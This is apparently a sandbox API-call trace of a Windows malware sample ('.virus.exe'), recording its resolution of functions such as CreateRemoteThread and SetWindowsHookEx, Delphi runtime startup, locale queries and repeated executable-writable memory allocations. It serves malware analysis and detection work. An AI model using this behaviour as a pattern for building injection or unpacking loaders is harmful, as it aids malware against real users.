lpProcName="FindResourceA") returned 0x75aae98b [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FindNextFileW") returned 0x75a954a6 [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FindNextFileA") returned 0x75abd52e [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FindFirstFileW") returned 0x75a943ed [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FileTimeToLocalFileTime") returned 0x75a9e256 [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FileTimeToDosDateTime") returned 0x75aac845 [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="EnumCalendarInfoA") returned 0x75ab9e40 [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="DeviceIoControl") returned 0x75a931df [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteFileW") returned 0x75a9896b [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteFileA") returned 0x75a953fc [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="CreateRemoteThread") returned 0x75b1470b [0054.360] GetProcAddress (hModule=0x75a80000, lpProcName="CreateMutexA") returned 0x75a94c23 [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateEventA") returned 0x75a9323c [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateDirectoryW") returned 0x75a94211 [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CreateDirectoryA") returned 0x75abd516 [0054.361] GetProcAddress (hModule=0x75a80000, lpProcName="CompareStringW") returned 0x75a93b7a [0054.362] GetProcAddress (hModule=0x75a80000, lpProcName="CompareStringA") returned 0x75a93c0a [0054.362] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0054.362] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadStringPtrA") returned 0x75ab3143 [0054.362] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0054.362] GetProcAddress (hModule=0x75980000, lpProcName="GetKeyboardType") returned 0x759d9ac4 [0054.362] GetProcAddress (hModule=0x75980000, lpProcName="LoadStringA") returned 0x7599db21 [0054.362] GetProcAddress (hModule=0x75980000, lpProcName="MessageBoxA") returned 0x759efd1e [0054.362] GetProcAddress (hModule=0x75980000, lpProcName="CharNextA") returned 0x75997a1b [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="CreateWindowExW") returned 0x75998a29 [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="CreateWindowExA") returned 0x7599d22e [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="WindowFromPoint") returned 0x759bed12 [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="WinHelpA") returned 0x759b557f [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="WaitMessage") returned 0x759bf5a9 [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="VkKeyScanW") returned 0x759bfdcd [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="UpdateLayeredWindow") returned 0x759aba4a [0054.363] GetProcAddress (hModule=0x75980000, lpProcName="UpdateWindow") returned 0x759a3559 [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="UnregisterClassW") returned 0x75999f84 [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="UnregisterClassA") returned 0x7599dced [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="TranslateMessage") returned 0x75997809 [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="TranslateMDISysAccel") returned 0x759a858e [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="TrackPopupMenu") returned 0x759bc288 [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="SystemParametersInfoA") returned 0x759a6c30 [0054.364] GetProcAddress (hModule=0x75980000, lpProcName="ShowWindow") returned 0x759a0dfb [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="ShowScrollBar") returned 0x759a4162 [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="ShowOwnedPopups") returned 0x759aae86 [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="ShowCursor") returned 0x759bf670 [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowTextW") returned 0x759a20ec [0054.365] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowTextA") returned 0x759a7aee [0054.366] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowPos") returned 0x75998e4e [0054.366] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowPlacement") returned 0x759a4ab6 [0054.366] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowLongW") returned 0x75998332 [0054.366] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowLongA") returned 0x759a6110 [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetTimer") returned 0x759979fb [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollRange") returned 0x759bd50b [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollPos") returned 0x759a87a5 [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetScrollInfo") returned 0x759a40cf [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetRect") returned 0x759a0e1b [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetPropA") returned 0x759a822c [0054.367] GetProcAddress (hModule=0x75980000, lpProcName="SetParent") returned 0x759a2d64 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetMenuItemInfoW") returned 0x759bd320 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetMenuItemInfoA") returned 0x759ad307 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetMenu") returned 0x759a2bb9 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetForegroundWindow") returned 0x759bf170 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetFocus") returned 0x759a2175 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetCursor") returned 0x759a41f6 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetClassLongA") returned 0x759ad5f9 [0054.368] GetProcAddress (hModule=0x75980000, lpProcName="SetCapture") returned 0x759bed56 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="SetActiveWindow") returned 0x759a3208 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="SendMessageW") returned 0x75999679 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="SendMessageA") returned 0x759a612e [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="ScrollWindow") returned 0x759a9320 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="ScreenToClient") returned 0x759a227d [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="RemovePropA") returned 0x759a8284 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="RemoveMenu") returned 0x759a7381 [0054.369] GetProcAddress (hModule=0x75980000, lpProcName="ReleaseDC") returned 0x75997446 [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="ReleaseCapture") returned 0x759bed49 [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="RegisterWindowMessageA") returned 0x759a0afa [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClipboardFormatA") returned 0x759a0afa [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClassW") returned 0x75998a65 [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="RegisterClassA") returned 0x759a434b [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="RedrawWindow") returned 0x759a140b [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="PtInRect") returned 0x759a11e9 [0054.370] GetProcAddress (hModule=0x75980000, lpProcName="PostQuitMessage") returned 0x75999abb [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="PostMessageW") returned 0x759a12a5 [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="PostMessageA") returned 0x759a3baa [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="OffsetRect") returned 0x759a0bbd [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="OemToCharA") returned 0x759f199f [0054.371] GetProcAddress (hModule=0x75980000, lpProcName="MsgWaitForMultipleObjects") returned 0x759a0b4a [0054.381] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x75410000 [0055.019] LoadLibraryA (lpLibFileName="SHFolder.dll") returned 0x75400000 [0055.083] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xe35c60 [0055.144] GetKeyboardType (nTypeFlag=0) returned 4 [0055.202] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0055.202] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0055.202] GetVersion () returned 0x1db10106 [0055.202] GetVersion () returned 0x1db10106 [0055.202] GetCurrentThreadId () returned 0xf38 [0055.319] GetModuleFileNameA (in: hModule=0x42d000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\keecfmwgj\\desktop\\.")) returned 0x0 [0055.319] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0055.319] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0055.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0055.873] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0055.874] lstrcpynA (in: lpString1=0x28f863, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0055.874] GetThreadLocale () returned 0x409 [0055.874] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0055.874] lstrlenA (lpString=".") returned 1 [0055.874] LoadStringA (in: hInstance=0x42d000, uID=0xffd6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0055.875] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xe37788 [0055.875] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2f70000 [0055.875] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xe38788 [0055.875] VirtualAlloc (lpAddress=0x2f70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffef, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffeb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffd0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffe5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0055.876] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0055.877] LoadStringA (in: hInstance=0x42d000, uID=0xfff4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0055.877] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0055.877] LoadStringA (in: hInstance=0x42d000, uID=0xfff2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0055.936] LoadStringA (in: hInstance=0x42d000, uID=0xfff0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0055.936] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0055.936] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77a90362, dwMinorVersion=0x77a8e192, dwBuildNumber=0x3, dwPlatformId=0x765123ae, szCSDVersion="\x13") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0055.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0055.936] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0055.936] GetThreadLocale () returned 0x409 [0056.014] GetThreadLocale () returned 0x409 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0056.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0056.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0056.016] GetThreadLocale () returned 0x409 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0056.016] GetThreadLocale () returned 0x409 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0056.016] GetThreadLocale () returned 0x409 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0056.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0056.017] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0056.017] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0056.075] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x3150000 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x3150590 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x3160598 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31705a0 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31805a8 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31905b0 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31a05b8 [0056.597] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31b05c0 [0056.598] RtlAllocateHeap (HeapHandle=0x3150000, Flags=0x0, Size=0x10000) returned 0x31c05c8 [0056.604] VirtualAlloc (lpAddress=0x2f74000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x2f74000 [0056.605] VirtualAlloc (lpAddress=0x2f7c000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x40) returned 0x2f7c000 [0056.608] VirtualAlloc (lpAddress=0x2f9c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2f9c000 [0056.608] VirtualAlloc (lpAddress=0x2fa0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0056.614] VirtualAlloc (lpAddress=0x2fd0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0056.614] VirtualAlloc (lpAddress=0x2fd4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd4000 [0056.615] VirtualAlloc (lpAddress=0x2fdc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fdc000 [0056.615] VirtualAlloc (lpAddress=0x2fe0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0056.616] VirtualAlloc (lpAddress=0x2fe4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe4000 [0056.616] VirtualAlloc (lpAddress=0x2fe8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe8000 [0056.617] VirtualAlloc (lpAddress=0x2fec000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2fec000 [0056.617] VirtualAlloc (lpAddress=0x2ff0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0056.618] VirtualAlloc (lpAddress=0x2ff4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff4000 [0056.618] VirtualAlloc (lpAddress=0x2ff8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff8000 [0056.619] VirtualAlloc (lpAddress=0x2ffc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ffc000 [0056.619] VirtualAlloc (lpAddress=0x3000000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0056.620] VirtualAlloc (lpAddress=0x3004000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3004000 [0056.620] VirtualAlloc (lpAddress=0x3008000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3008000 [0056.621] VirtualAlloc (lpAddress=0x300c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x300c000 [0056.621] 